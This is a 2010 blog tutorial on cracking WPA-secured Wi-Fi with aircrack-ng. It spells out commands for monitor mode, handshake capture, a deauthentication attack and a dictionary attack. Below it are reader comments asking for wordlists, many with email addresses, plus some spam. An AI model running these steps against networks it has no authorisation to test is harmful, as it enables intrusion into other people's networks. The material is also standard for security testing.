WPA Wireless Hacking
by Josh Houston on Mar.11, 2010, under Hacking, Security, Tips & Tricks, Uncategorized, Wireless
In this Video Tutorial, I show you how to crack a wireless network secured with WPA encryption. Although it may sound hard, it is actually quite easier than you may think. I also have provided a Written tutorial for you to save, and the video is also available for download. The following are links to an outside website (mediafire) providing hosting for the videos. Video
- Type in “airmon-ng” to see wireless adaptors on your computer.
- You should see a listing come up. Mine showed wlan0. Yours may be different, such a rausb0.
Type in “airmon-ng start wlan0” to start your wireless device. Replace the “wlan0” with whatever yours showed to be. This will create a new “virtual” device, and will show the name. The name for mine was “mon0“ - Open a new terminal window, and type “airodump mon0” again, replacing “mon0” with your new virtual devices name.
You will begin to see a listing of different APs (access points). Find the one you want and press Control + C. Pressing Control + C will cancel the current program running in terminal. The name of the networks found is under the ESSID column. You may not see anything there, which is fine, some of them are invisible. Home.net is the name of my network, which is the ESSID. - This is what I typed after that, “airodump-ng -c 6 -w Home.netWPA –output-format ivs mon0” This is all real easy stuff, so I’ll just explain it to you right quick. airodump-ng is a program which will capture the WPA handshake, which we will need in order to use a dictionary attack on. Here goes!
- Type “airodump-ng”
- Add a space and type “–channel 6″ replacing the number 6 with the number of the channel of your Network (although 6 is VERY common, so don’t be surprised if that is it)
- Add a space and type “-w Home.netWPA“ replacing Home.netWPA with the name of your network, or something you can remember.
- Add a space and type “–output-format ivs”. This will tell airodump-ng to save our file in the ivs format, which we will use later for cracking.
- The “mon0″ at the end, simply defines which device to use.
- Open a New Terminal Window. In it, type “aireplay-ng -0 1 -e Home.net mon0″
- aireplay-ng is the tool that is going to allow us to perform the deauthentication attack, which will be needed in order to successfully crack the password.
- The “-0 1″ flag tells the program to perform the deauthenication attack on a station, rather than all clients, which can really slow down progress.
- The “-e Home.net” tells which address to attack. The -e stands for essid which is the address of your network. So you will have to replace Home.net with the address of your network (the one that I recommended you write down or copy earlier).
- The “mon0″ at the end, again just defines which device to use.
- In our airodump-ng window, if you have not already, press Control + C, and type: “aircrack-ng -w list.lst Home.netWPA-01.ivs″.
This is our last step in our attack, cracking the password against our Dictionary list, here goes:- aircrack-ng is going to allow us to take the WPA captured passphrase, and will use our ESSID along with every entry in our Dictionary list, to try and “guess” the password.
- The “-w list.lst” tells aircrack-ng which dictionary file to use. If you are using Backtrack 4, then you can just place the dictionary list on your desktop, and replace list.lst with your file name.
- And lastly, “Home.netWPA-01.ivs” instructs aircrack-ng to attempt to crack this file.
- If all goes well, the password was in your password list, and you now have the password to your network! Congratulations! Now…. Go make a password that isn’t in a dictionary….
- E-mail me about donating to keep this blog up.
March 12th, 2010 on 4:34 am
Hai..when i type airmon-ng in console..it dosnt show up ny wireless cards available…but i have DELL laptop with wireless card…do i need to install ny drivers to make it active or am i missing ny commands to activate it?
pls tell
March 14th, 2010 on 11:52 am
Thanx for everything,your doing a great job. Can you pls tell me where to find an word list wich contains words from all languages, or at least from popular ones (english,french,spanish,dutch,portugues,romanian,italian,maybe russian etc.)???Or at least where to search for it…Thanx again and keep the good work
March 23rd, 2010 on 5:56 pm
i am from romania and i don’t know to goo english so i copy paste
“Thanx for everything,your doing a great job. Can you pls tell me where to find an word list wich contains words from all languages, or at least from popular ones(english,french,spanish,dutch,portugues,romanian,italian,maybe russian etc.)???Or at least where to search for it…Thanx again and keep the good work”
April 1st, 2010 on 7:36 am
Hi!
Can i have your dictionary list? Kindly send to my email address?
darkbytes31@gmail.com
Thanks in advance!!
April 5th, 2010 on 1:30 am
Dear Josh,
Can you send me your dictionary list as well?
plimper@gmail.com
Regards
plimper
April 16th, 2010 on 11:31 pm
hi, im new here and im still trying to understand except for the dictionary list.. can u send me a good dictionary list… thank you..
April 16th, 2010 on 11:31 pm
jarold_v@yahoo.com
April 20th, 2010 on 5:49 am
i`m also interested for your dictionary list. please sent it on doroft3i@yahoo.com .
Thanks a lot !
April 20th, 2010 on 8:51 pm
Vor kurzem las ich die Erinnerung an einen Jungen Soldat. Was sind einige andere Bücher, die talka bout Kinderarbeit Kindersoldaten etc.. . . gute Bücher über die Menschenrechte?
April 24th, 2010 on 12:04 pm
A bad penny always turns up.
April 28th, 2010 on 8:04 pm
It might be really difficult for single mothers at a young age to cope up with the needs of her child. A lot has to be taken care of in bringing up the child which includes the welfare of the child as well as managing with one’s own education. Moreover, it is really tough to lead a life alone after separating from the spouse.
April 29th, 2010 on 8:54 am
What a excelent blog!
May 6th, 2010 on 10:27 pm
I’m going to bookmark this so I can finish reading it later.
May 8th, 2010 on 12:14 am
ok so for the ppl who want the worldlist follow these stips you dont have to download it or anything it is in your backtrack4 saved so here we go..
1.open your konqueror it is on the one with the earth pic …the second one on your menu
2. ok once you open that click “Home Folder”
3. ok now press the up key by the up key i mean the key that is pointing up and it is in blue color
4. now you will see allot of blue folders find “pentest” click and it will open
5. now find the “passwords” folder and click it to open it
6.now you ill see another list of folders find “worldlist” and yes that is the one with the worldlist.lst in it so open that
7. now you should see an .lst file for me it is darkc0de.lst and now you can drag it and copy it to your desktop and your done……..
8. have a nice day:)
May 22nd, 2010 on 11:15 am
hello can u send me the dictonry list and how to uploaded to to backtrack thk email
nasser_q11@yahoo.com
May 26th, 2010 on 7:20 am
Hi . i have question about if i know the wpa key . how to use key for decrypt the packet ?
May 27th, 2010 on 12:42 am
How ya been Josh? Haven’t seen you in awhile.
To the dictionary crackers out there, a simple half hour of googling will probably land you with a wordlist of the entire websters dictionary in a text document format. I know this because I used it to crack Kerb-Preauth hashes for password recovery. These are very, Very effiecient for English users. However, I don’t know about any other languages.
Happy Shelling,
Willie
June 10th, 2010 on 8:06 pm
ok now i’m stuck hahah exactly how? do you make so very much mobsters cause i only have seven ( which includes me! ) plus i dont think i am want to achieve higher in addition i’m lvl 19 and also acquiring better so how do i develop my own mafia quick from such a small level Or is this a site to question?
June 28th, 2010 on 4:22 am
does wpa always need dictionary?so if the password doesn’t exist in dictionary…so we wouldn’t be able to crack em?is there have another way to crack wpa without using dictionary..?
July 3rd, 2010 on 5:13 pm
There are plenty of ways to use single mother welfare.
July 7th, 2010 on 8:33 pm
ello! when i open for the 2nd konsole in wpa cracking for the command #aireplay-ng -0 1 -e …..
it only show no such bssid but i follow all your commands. can you help me pls. God bless!
July 13th, 2010 on 5:43 pm
Can you please send me the dictionary list as well? thanks so much
July 14th, 2010 on 11:01 am
thnx for leson
i need password list
^.^
July 20th, 2010 on 6:33 pm
Fantastic tutorials
Same as everyone else anychance of mailing dictionary file.
Thanks
Matt
July 28th, 2010 on 1:53 am
Dear Josh,
Can you send me your dictionary list ?
thank before,
ins_cyber@yahoo.com
September 27th, 2010 on 5:25 am
hey josh, could you send me the dictionary list also please
send it to marcus1989@hotmail.co.uk
thanks dude